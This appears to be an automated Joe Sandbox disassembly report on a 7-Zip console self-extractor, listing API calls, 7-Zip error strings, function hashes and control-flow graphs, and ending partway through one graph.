                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrowmemmove$malloc
                              • String ID: Cannot create output directory
                              • API String ID: 159934335-1181934277
                              • Opcode ID: 2f10caa28412ac4f7e1d2c8bdc0615199bc42ce7b530f4a6929b9d5e33afb12b
                              • Instruction ID: 49e5535194581c9077558fead95c241cc89778969e7976961e6d0883eba070e7
                              • Opcode Fuzzy Hash: 2f10caa28412ac4f7e1d2c8bdc0615199bc42ce7b530f4a6929b9d5e33afb12b
                              • Instruction Fuzzy Hash: 8142C222609BC592DF70EB25E8903AEB361F3C5B94FA44112DA8D47B19CF3DC865EB01
                              APIs
                              Strings
                              • Only one archive can be created with rename command, xrefs: 00F85DF7
                              • Cannot use absolute pathnames for this command, xrefs: 00F858E8
                              • The command must be specified, xrefs: 00F8515E
                              • Unsupported -spf:, xrefs: 00F852DF
                              • Unsupported -spm:, xrefs: 00F8552D
                              • Cannot find archive name, xrefs: 00F8558E
                              • Archive name cannot by empty, xrefs: 00F855D4
                              • Unsupported command:, xrefs: 00F851C5
                              • Incorrect number of benchmark iterations, xrefs: 00F85E5F
                              • I won't write data and program's messages to same stream, xrefs: 00F85AA3, 00F85D98
                              • Unsupported -snz:, xrefs: 00F85953
                              • I won't write compressed data to a terminal, xrefs: 00F85D57
                              • stdout mode and email mode cannot be combined, xrefs: 00F85D26
                              • -ai switch is not supported for this command, xrefs: 00F85BB4
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ExceptionThrow$wcscmp$free
                              • String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect number of benchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -snz:$Unsupported -spf:$Unsupported -spm:$Unsupported command:$stdout mode and email mode cannot be combined
                              • API String ID: 225321437-2319225105
                              • Opcode ID: 3202f9a66226af083b18468dc7675a34c977d3d8c8771206bff99535c8c8a207
                              • Instruction ID: 42f2358ecdc86b69f5e449efc2347ca17119e774bc3d8aaa1f20fcaa62114474
                              • Opcode Fuzzy Hash: 3202f9a66226af083b18468dc7675a34c977d3d8c8771206bff99535c8c8a207
                              • Instruction Fuzzy Hash: 63820677704AC1A7DB24DF28D5903EDBBA1F395B84F888026C78947B25CB38D5A9E701
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 70b7bcc3ea81bab64ced7b7cb59cd13f36b8e48cd5f8edd397eb3d07964e819d
                              • Instruction ID: 3d9fe214a3311faf37a5a560abff1f1d980dc52e3a8a5a0fe6470e5268599ed8
                              • Opcode Fuzzy Hash: 70b7bcc3ea81bab64ced7b7cb59cd13f36b8e48cd5f8edd397eb3d07964e819d
                              • Instruction Fuzzy Hash: DD42047B609BC486CBA0EB35E4506AF7764F386B88F859002DA8E47B15DF3CC499E711

                              Control-flow Graph

                              • Executed
                              • Not Executed
                               [Control-flow graph of the function at 00F7798C (basic blocks f7798c through f77d22, marked executed / not executed): the blocks call CreateDirectoryW, GetLastError and free and the subroutines 00F786C8, 00F7AE24, 00F7AF80, 00F735B8, 00F73B28, 00F736A8, 00F7B1E4, 00F7354C, 00F7B8B0, 00F78290, 00F788EC, 00F7AB3C, 00F737F0 and 00F773B0; graph image not recoverable from the text]
                              APIs
                                • Part of subcall function 00F786C8: GetFileAttributesW.KERNELBASE ref: 00F786EA
                                • Part of subcall function 00F786C8: GetFileAttributesW.KERNEL32 ref: 00F78721
                                • Part of subcall function 00F786C8: free.MSVCRT ref: 00F7872E
                              • free.MSVCRT ref: 00F77CC0
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AttributesFilefree
                              • String ID:
                              • API String ID: 1936811914-0
                              • Opcode ID: d5df66043947abe2c4a22f88f0be180330a6ff37c290fd6690ffada23aa0e52b
                              • Instruction ID: ec812379451d7681d6553bc62ec506f3f9a3a3ea01590f758821f9ab5c0c2021
                              • Opcode Fuzzy Hash: d5df66043947abe2c4a22f88f0be180330a6ff37c290fd6690ffada23aa0e52b
                              • Instruction Fuzzy Hash: 9581B72322C78582DB70FB21E84176E7321FBC5754F549123EA8E87669DF2DC905A713
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: CloseHandle$ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                              • String ID: SeSecurityPrivilege
                              • API String ID: 1313864721-2333288578
                              • Opcode ID: 13693f38d7738a30ba756f3a7d22b965bb90a9711b1adfad48e363eb8eb3698f
                              • Instruction ID: d67850b38523ea2855c913eed4fce95ef7666c628edc062b9628ba6925d203a0
                              • Opcode Fuzzy Hash: 13693f38d7738a30ba756f3a7d22b965bb90a9711b1adfad48e363eb8eb3698f
                              • Instruction Fuzzy Hash: AB114C72604B4582DA519B12F9583BDB367FFC4B91F944126EA8F82E58CF3CC589EB10
                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 00F7BD1C
                              • OpenProcessToken.ADVAPI32 ref: 00F7BD2D
                              • LookupPrivilegeValueW.ADVAPI32 ref: 00F7BD41
                              • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,?,?,00F839B9), ref: 00F7BD78
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00F839B9), ref: 00F7BD82
                              • CloseHandle.KERNELBASE ref: 00F7BD92
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                              • String ID:
                              • API String ID: 3398352648-0
                              • Opcode ID: d0eb4f3097e7eb5d21bf66f0fe04757f56b0f7c49c0d7fccda7d879dd754992b
                              • Instruction ID: 2295dce365f08a43d305d3a4b098cca574efb55cc0cffd36916ffcd43b95628e
                              • Opcode Fuzzy Hash: d0eb4f3097e7eb5d21bf66f0fe04757f56b0f7c49c0d7fccda7d879dd754992b
                              • Instruction Fuzzy Hash: 8B01527261464287DB209FB0F8947AE7361F780B95F549536EA8A83A54CF3CC449DB00
                              APIs
                                • Part of subcall function 00F782EC: FindClose.KERNELBASE ref: 00F782FE
                              • FindFirstFileW.KERNELBASE ref: 00F7835A
                                • Part of subcall function 00F73730: free.MSVCRT ref: 00F7376A
                                • Part of subcall function 00F73730: memmove.MSVCRT(00000000,?,?,00000000,00F710B0), ref: 00F73785
                              • FindFirstFileW.KERNELBASE ref: 00F7839A
                              • free.MSVCRT ref: 00F783A8
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: Find$FileFirstfree$Closememmove
                              • String ID:
                              • API String ID: 2921071498-0
                              • Opcode ID: 230bb173f7b7721554616a5d78efc44195ac5eb57b7e025098c530a0a1adbf2a
                              • Instruction ID: 32c7790a4a0ca574eb7abdadbbd5d174dd9b3eadccee1f8bb827afaa18e4cfeb
                              • Opcode Fuzzy Hash: 230bb173f7b7721554616a5d78efc44195ac5eb57b7e025098c530a0a1adbf2a
                              • Instruction Fuzzy Hash: 94213072604A8086DB60DF28E8443597361F78ABB9F548312EABD477D9DF3CC546D701

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrowfputs$fputc
                              • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
                              • API String ID: 1639683984-435538426
                              • Opcode ID: 5955122702003f69023d9f82adba55d8a6b5774e256a29e9b2a1d40bb052a14f
                              • Instruction ID: d2b3e162d32f513444c6633f43bd52404ac9e15dab6852c9593537bc0f0c519e
                              • Opcode Fuzzy Hash: 5955122702003f69023d9f82adba55d8a6b5774e256a29e9b2a1d40bb052a14f
                              • Instruction Fuzzy Hash: F572BA32609AC295CA74EF25E9917EEB361F785B84F40802BCA8D43B1ADF3CC555EB01

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputcfputsfree
                              • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
                              • API String ID: 2822829076-727241755
                              • Opcode ID: 067a8c7e4fc7e37eecfa726413d9de64729ccea8d662f94fbd9b6a9cf1d7a761
                              • Instruction ID: 7165d90dc6b4cd6873a5e36b5ba8f75a181c6c8008d1ecf73fca0b7643b93992
                              • Opcode Fuzzy Hash: 067a8c7e4fc7e37eecfa726413d9de64729ccea8d662f94fbd9b6a9cf1d7a761
                              • Instruction Fuzzy Hash: 8722C132709AC692CA74EB25E9913EEB361F785B84F44802BDA8D03B59CF3CC555E702

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: AddressProc
                              • String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
                              • API String ID: 190572456-3984264347
                              • Opcode ID: 1f70778ba01c17241a307a25a73a55545ac7aa42571749a48baa1ee7a2c8c9a9
                              • Instruction ID: 67688dad34759acf10b4a0097233611450cf4b7d5cb3e9e8e9ecc62d5f11c10f
                              • Opcode Fuzzy Hash: 1f70778ba01c17241a307a25a73a55545ac7aa42571749a48baa1ee7a2c8c9a9
                              • Instruction Fuzzy Hash: E6E1827221DBC496CB60EB21E88079EB7A5F7C6B80F404522EA8E47B19DF7CC555EB01
                              APIs
                                • Part of subcall function 00F8A7E4: free.MSVCRT ref: 00F8A987
                              • free.MSVCRT ref: 00F8AD79
                              • free.MSVCRT ref: 00F8ADFE
                              • free.MSVCRT ref: 00F8AE8E
                                • Part of subcall function 00F8A9FC: free.MSVCRT ref: 00F8AA50
                                • Part of subcall function 00F8A9FC: free.MSVCRT ref: 00F8AA58
                                • Part of subcall function 00F8A9FC: free.MSVCRT ref: 00F8AA8F
                                • Part of subcall function 00F8A9FC: free.MSVCRT ref: 00F8AA97
                                • Part of subcall function 00F8A9FC: free.MSVCRT ref: 00F8AAA5
                              • free.MSVCRT ref: 00F8AEE8
                              • free.MSVCRT ref: 00F8AF13
                              • free.MSVCRT ref: 00F8AF2A
                              • free.MSVCRT ref: 00F8AF5B
                              • free.MSVCRT ref: 00F8AF9C
                                • Part of subcall function 00F8728C: free.MSVCRT ref: 00F875ED
                              • free.MSVCRT ref: 00F8B56F
                              Strings
                              • Cannot create hard link, xrefs: 00F8B0CC
                              • Cannot seek to begin of file, xrefs: 00F8B3D8
                              • Cannot open output file, xrefs: 00F8B19B
                              • Cannot set length for output file, xrefs: 00F8B389
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: Cannot create hard link$Cannot open output file$Cannot seek to begin of file$Cannot set length for output file
                              • API String ID: 1294909896-1337951305
                              • Opcode ID: a04a168ff9dc1034c665fe7f9fa15fe45a2cd22c26bc97128ca1d1a293480453
                              • Instruction ID: b5cd89864e2985813073f53e9a931ffc1277798f4410b35f9295ee70e627e208
                              • Opcode Fuzzy Hash: a04a168ff9dc1034c665fe7f9fa15fe45a2cd22c26bc97128ca1d1a293480453
                              • Instruction Fuzzy Hash: 6832C573708AC496CB64FF25D8902ED7720F785B90F549022EB9E4BB15DF29C8A6E301

                              Control-flow Graph

                              APIs
                              Strings
                              • Unsupported switch postfix -stm, xrefs: 00F83AF6
                              • : ERROR : , xrefs: 00F83B52
                              • Set process affinity mask: , xrefs: 00F83AAE
                              • SeLockMemoryPrivilege, xrefs: 00F83A60
                              • Unsupported switch postfix for -slp, xrefs: 00F83A26
                              • SeCreateSymbolicLinkPrivilege, xrefs: 00F839BB
                              • Unsupported switch postfix -bb, xrefs: 00F83958
                              • SeRestorePrivilege, xrefs: 00F839AD
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrow$_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                              • String ID: : ERROR : $SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
                              • API String ID: 1978914637-1912842784
                              • Opcode ID: e7f2b4835cd6f56cb91759103e716ae9380ec5db3458876911303f3e00291719
                              • Instruction ID: 1c9a30e93d76f32bf546064fdaaeb5d3dfa6d4da71d05a4404453c1af8537af2
                              • Opcode Fuzzy Hash: e7f2b4835cd6f56cb91759103e716ae9380ec5db3458876911303f3e00291719
                              • Instruction Fuzzy Hash: 97C17A336046C19ADB61EF25D8803AC7B62F795F94F488126EA8D47B35CF38CA95E701

                              Control-flow Graph

                              • Executed
                              • Not Executed
                               control_flow_graph 2593 f788ec-f78911 2594 f78913-f78917 2593->2594 2595 f78919-f7891e 2593->2595 2594->2595 2596 f7896f-f78979 call f7ac10 2594->2596 2597 f78927-f7892f 2595->2597 2598 f78920-f78925 2595->2598 2604 f78a5f-f78a6b call f7ae80 2596->2604 2605 f7897f-f789b9 call f73730 call f7ad8c 2596->2605 2597->2596 2599 f78931-f78935 2597->2599 2598->2596 2598->2597 2599->2596 2601 f78937-f7896a call f73730 2599->2601 2610 f79051-f7905c 2601->2610 2612 f78a71-f78a78 2604->2612 2613 f78ce8-f78d1e call f7adac call f7abe4 2604->2613 2618 f78a1e-f78a3a call f79fc4 2605->2618 2619 f789bb-f789bf 2605->2619 2612->2613 2615 f78a7e-f78a9f call f735b8 * 2 2612->2615 2630 f78d24-f78d2b 2613->2630 2631 f78db9-f78dbd 2613->2631 2640 f78aa1-f78aaa 2615->2640 2641 f78aae-f78ab3 2615->2641 2634 f78a3e-f78a42 2618->2634 2635 f78a3c 2618->2635 2619->2618 2622 f789c1-f78a0a call f7bc48 2619->2622 2622->2618 2639 f78a0c-f78a19 2622->2639 2630->2631 2638 f78d31-f78d40 call f786c8 2630->2638 2636 f78dbf-f78dc3 2631->2636 2637 f78dc9-f78dcd 2631->2637 2643 f78a44-f78a49 2634->2643 2644 f78a4c 2634->2644 2642 f78a4e-f78a5a call f7960c 2635->2642 2636->2637 2645 f78ff5-f79012 call f78318 2636->2645 2646 f78e36-f78e40 call f7ad28 2637->2646 2647 f78dcf-f78de1 call f786c8 2637->2647 2638->2645 2660 f78d46-f78d4f 2638->2660 2639->2610 2640->2641 2649 f78ab5-f78ad1 call f72a70 2641->2649 2650 f78ad3-f78adf call f739f0 2641->2650 2642->2610 2643->2644 2644->2642 2668 f79014-f79016 2645->2668 2669 f79041-f79049 call f782ec 2645->2669 2646->2645 2670 f78e46-f78e50 2646->2670 2647->2645 2666 f78de7-f78df0 2647->2666 2649->2650 2664 f78ae4-f78af5 call f7ad8c 2649->2664 2650->2664 2660->2645 2667 f78d55-f78d88 call f73730 2660->2667 2677 f78af7-f78afa 2664->2677 2678 f78b44-f78b56 call f788ec 2664->2678 2666->2645 2673 f78df6-f78e31 call f782ec 2666->2673 2687 f78d8a-f78d95 2667->2687 2688 f78d99-f78db4 call f78770 call f782ec 2667->2688 2668->2669 2675 f79018-f79021 2668->2675 2679 f7904e 2669->2679 2670->2645 2676 f78e56-f78e60 call f7ab3c 2670->2676 2673->2610 2675->2669 2682 f79023-f7903f call f78770 call f782ec 2675->2682 2676->2645 2692 f78e66-f78e73 call f78770 2676->2692 2684 f78afc-f78aff 2677->2684 2685 f78b08-f78b36 2677->2685 2694 f78b5c-f78ba3 call f736a8 call f7354c call f78680 2678->2694 2702 f78cd3-f78ce3 free * 2 2678->2702 2679->2610 2682->2610 2684->2678 2693 f78b01-f78b06 2684->2693 2685->2694 2695 f78b38-f78b42 call f73798 2685->2695 2687->2688 2688->2610 2710 f78e96-f78eac call f735b8 2692->2710 2711 f78e75-f78e91 call f73730 call f782ec 2692->2711 2693->2678 2693->2685 2724 f78bf5-f78c20 free * 2 call f782ec free 2694->2724 2725 f78ba5-f78bac 2694->2725 2695->2694 2702->2613 2722 f78eae-f78eb8 call f732b0 2710->2722 2723 f78ebc-f78ed7 2710->2723 2711->2610 2722->2723 2728 f78ee7-f78f1c call f78318 2723->2728 2729 f78ed9-f78ee3 call f732b0 2723->2729 2745 f78cc2-f78cce free 2724->2745 2732 f78c25-f78c5c SetLastError free * 2 call f782ec free 2725->2732 2733 f78bae-f78bbf call f728e8 2725->2733 2742 f78f76-f78f90 call f786c8 2728->2742 2743 f78f1e-f78f3c wcscmp 2728->2743 2729->2728 2732->2745 2748 f78bc5-f78bf3 free call f7354c call f78680 2733->2748 2749 f78c5e-f78c65 2733->2749 2760 f78fa7-f78ff3 call f73730 free call f782ec 2742->2760 2761 f78f92-f78f94 2742->2761 2746 f78f6e 2743->2746 2747 f78f3e-f78f69 call f73730 free call f782ec 2743->2747 2745->2610 2746->2742 2747->2610 2748->2724 2748->2725 2751 f78c67-f78c6c 2749->2751 2752 f78c7b-f78cc0 call f739ac free * 2 call f782ec free 2749->2752 2751->2752 2756 f78c6e-f78c77 2751->2756 2752->2745 2756->2752 2760->2610 2762 f78f96-f78f99 2761->2762 2763 f78f9b-f78fa5 free 2761->2763 2762->2760 2762->2763 2763->2645
                              APIs
                                • Part of subcall function 00F735B8: memmove.MSVCRT ref: 00F735F0
                              • free.MSVCRT ref: 00F78BCA
                              • free.MSVCRT ref: 00F78BFA
                              • free.MSVCRT ref: 00F78C05
                              • free.MSVCRT ref: 00F78C1A
                              • free.MSVCRT ref: 00F78CC7
                                • Part of subcall function 00F788EC: SetLastError.KERNEL32 ref: 00F78C2A
                                • Part of subcall function 00F788EC: free.MSVCRT ref: 00F78C36
                                • Part of subcall function 00F788EC: free.MSVCRT ref: 00F78C41
                                • Part of subcall function 00F788EC: free.MSVCRT ref: 00F78C56
                                • Part of subcall function 00F788EC: free.MSVCRT ref: 00F78CD8
                                • Part of subcall function 00F788EC: free.MSVCRT ref: 00F78CE3
                              • free.MSVCRT ref: 00F78C9A
                              • free.MSVCRT ref: 00F78CA5
                              • free.MSVCRT ref: 00F78CBA
                              • wcscmp.MSVCRT ref: 00F78F34
                              • free.MSVCRT ref: 00F78F54
                              • free.MSVCRT ref: 00F78FA0
                                • Part of subcall function 00F73730: free.MSVCRT ref: 00F7376A
                                • Part of subcall function 00F73730: memmove.MSVCRT(00000000,?,?,00000000,00F710B0), ref: 00F73785
                              • free.MSVCRT ref: 00F78FDE
                                • Part of subcall function 00F782EC: FindClose.KERNELBASE ref: 00F782FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                               • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmp
                               • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove$CloseErrorFindLastwcscmp
                              • String ID: :$:$DATA$\
                              • API String ID: 2757989841-1004618218
                              • Opcode ID: 684f0238800f49a8f2224511bac49db6db9c33bf41c8a873e7da94822aca7b48
                              • Instruction ID: 86b713ca5be1c98421688c2077ac8cf6c5ad2000bbec581c36a3d4b31a9c981a
                              • Opcode Fuzzy Hash: 684f0238800f49a8f2224511bac49db6db9c33bf41c8a873e7da94822aca7b48
                              • Instruction Fuzzy Hash: BB12047254868096CB60EF29D89026DB771F395790F80C11BE78E87B64DF38C5A7EB06

                              Control-flow Graph

                              • Executed
                              • Not Executed
                               control_flow_graph 2775 f8728c-f872df call f78290 call f7354c call f788ec 2782 f875f9-f87605 call f7ae80 2775->2782 2783 f872e5-f872e9 2775->2783 2794 f8760b-f87616 2782->2794 2795 f876a3-f876b3 free 2782->2795 2785 f872eb 2783->2785 2786 f872f0-f872f3 2783->2786 2788 f875e5-f875f4 free 2785->2788 2789 f872f9-f873ac call f73b28 call f85f40 call f734d0 free 2786->2789 2790 f8744b-f8744f 2786->2790 2793 f876b5-f876c2 2788->2793 2844 f873ae-f873bc free 2789->2844 2845 f873c1-f873ca 2789->2845 2791 f87490-f87494 2790->2791 2792 f87451-f8745b call f7e70c 2790->2792 2799 f8749a-f874b4 call f736a8 call f7e70c 2791->2799 2800 f87562-f8756e 2791->2800 2809 f8745d-f87471 call f86e00 2792->2809 2810 f87484-f8748b 2792->2810 2794->2795 2798 f8761c-f8762e call f736a8 2794->2798 2795->2793 2820 f8763d-f8766f call f78290 call f7354c call f788ec 2798->2820 2821 f87630-f87639 2798->2821 2829 f874f5-f87504 call f77130 2799->2829 2830 f874b6-f874cc call f86e00 2799->2830 2802 f8759c-f875a6 call f79164 2800->2802 2803 f87570-f8757a call f77088 2800->2803 2802->2795 2827 f875ac-f875b6 call f77474 2802->2827 2803->2795 2825 f87580-f87594 call f86e88 2803->2825 2832 f8747a-f8747f 2809->2832 2833 f87473-f87475 2809->2833 2810->2795 2863 f8768b-f8769e free * 2 2820->2863 2864 f87671-f8767b 2820->2864 2821->2820 2847 f8759a 2825->2847 2848 f87596-f87598 2825->2848 2827->2795 2841 f875bc-f875c5 GetLastError 2827->2841 2855 f87553-f8755d free 2829->2855 2856 f87506-f8752a call f795e0 call f86f80 2829->2856 2851 f874ce-f874db free 2830->2851 2852 f874e0-f874f0 free 2830->2852 2832->2788 2833->2788 2841->2795 2849 f875cb-f875df call f86e88 2841->2849 2844->2788 2853 f873cc-f873ce 2845->2853 2854 f87441-f87446 free 2845->2854 2847->2788 2848->2788 2849->2788 2868 f875e1-f875e3 2849->2868 2851->2788 2852->2788 2859 f8743a 2853->2859 2860 f873d0-f873d2 2853->2860 2854->2790 2855->2795 2880 f8752c-f87539 free 2856->2880 2881 f8753e-f8754e free 2856->2881 2859->2854 2865 f8742a-f87435 free 2860->2865 2866 f873d4-f873d6 2860->2866 2863->2795 2864->2863 2869 f8767d-f87685 call f76fcc 2864->2869 2865->2788 2870 f873d8-f873da 